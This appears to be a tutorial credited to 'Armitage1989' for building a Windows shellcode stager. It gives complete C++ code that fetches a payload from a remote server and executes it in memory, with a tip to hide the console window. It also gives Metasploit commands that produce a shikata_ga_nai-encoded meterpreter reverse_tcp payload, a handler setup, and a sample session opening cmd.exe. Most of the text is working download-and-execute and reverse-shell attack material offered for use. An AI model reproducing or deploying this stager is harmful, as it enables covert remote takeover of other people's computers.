control – respect to armitage1989

This is not an original idea.  please view http://www.securitytube.net/video/2908 and pay respect to Armitage1989

apache server set up

1. Set up a share folder.

mkdir /var/www/share

chmod -R 755 /var/www/share/

chown -R www-data:www-data /var/www/share/

To veiw if sharing type
ls -la /var/www/ | grep share

#########################

2. Start web server

service apache2 start

To shut down simply replace start with stop.

##########################

3. If not installed

apt-get install apache2

##########################

4. Copy files to the share

cp /root/.msf4/data/exploits/* /var/www/share/
–> * was a wildcard that mean I want to select all the folder contents

###########################

5. Access the file from another machine

http://(servers ip)/share

#############################

please watch http://www.securitytube.net/video/2908

Armitage1989 – created the c++ code which was originaly posted at http://pastebin.com/u/armitage1989

down load Dev-C++4.9.9.2 for windows http://www.bloodshed.net/dev/devcpp.html

1. Create new project / Windows Application OK Save location to were you like.
2. Delete all in the development window and paste in the code bellow.
3. Under project window right click on your project and click Project Options (or press Alt+p)
4. under Parameters tab paste in under Linker -lwininet press OK
4. Compile save location to were you like.

Code copy bellow and paste

//include library wininet this have a funtions InternetOpen(),InternetOpenUrl(),InternetReadFile(),InternetCloseHandle(),
#include <windows.h>
#include<iostream>
#include<cstring>
#include<Wininet.h>
using namespace std;
//this is a buffer with shellcode data in .bss section
unsigned char DataReceived[500];
int main(){
int i;
//this configure a HTTP agent to surf
HINTERNET connect = InternetOpen("MyBrowser",INTERNET_OPEN_TYPE_PRECONFIG,NULL, NULL, 0);
//if for validate connection.
if(!connect){
cout<<"Connection Failed or Syntax error";
return 0;
}
//Open a malicious url
HINTERNET OpenAddress = InternetOpenUrl(connect,"http://192.168.16.2/ascii.bin", NULL, 0, INTERNET_FLAG_PRAGMA_NOCACHE|INTERNET_FLAG_KEEP_CONNECTION, 0);

//this check the handler for URL
if ( !OpenAddress )
{
DWORD ErrorNum = GetLastError();
cout<<"Failed to open URL \nError No: "<<ErrorNum;
InternetCloseHandle(connect);
return 0;
}

DWORD NumberOfBytesRead = 0;

//this recovery a file on server and save data into DataReceived
while(InternetReadFile(OpenAddress, DataReceived, 4096, &NumberOfBytesRead) && NumberOfBytesRead )
{
//this print the data in format \x00 you can delete this routine
for(i=0;i<sizeof DataReceived; i++ ){

printf("\\x%02x",DataReceived[i]);

}
/*this routine is a other implementattion of shellcode-test but in this routine i use  __asm () directive for call asm intrucctions.
1)first i store a pointer to buffer in EAX register
2)push eax, Pointer to DataReceived in stack now esp point to first 4 bytes of shellcode
3)the ret instruction put the value of esp+4 into eip and pass the execution.
4)finally the shellcode in DataReceived is executed
5)all handler is closed.
NOTA:
you can put a nopsled before shellcode for estabilish execution .
use freeconsole for hidden a Dos Windows
*/
__asm ("lea _DataReceived, %eax");
__asm ("push %eax");
__asm ("ret");
}

InternetCloseHandle(OpenAddress);
InternetCloseHandle(connect);

return 0;
}

############################

please watch http://www.securitytube.net/video/2908

start msfconsole

use multi/handler
set windows/meterpreter/reverse_tcp lhost (ip address) lport (port of choice)
exploit

open new console window and

msfpayload windows/meterpreter/reverse_tcp LHOST=ip address LPORT=port of choice R| msfencode -e x86/shikata_ga_nai -t raw -a x86 -b ‘\x00\x0a\x0d’ -c 1 x>/var/www/share/your-file.bin

once the exe is run on the machine the Meterpreter should report a session

meterpreter > execute -f cmd.exe -c
Process 2508 created.
Channel 1 created.
meterpreter > interact 1
Interacting with channel 1…

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.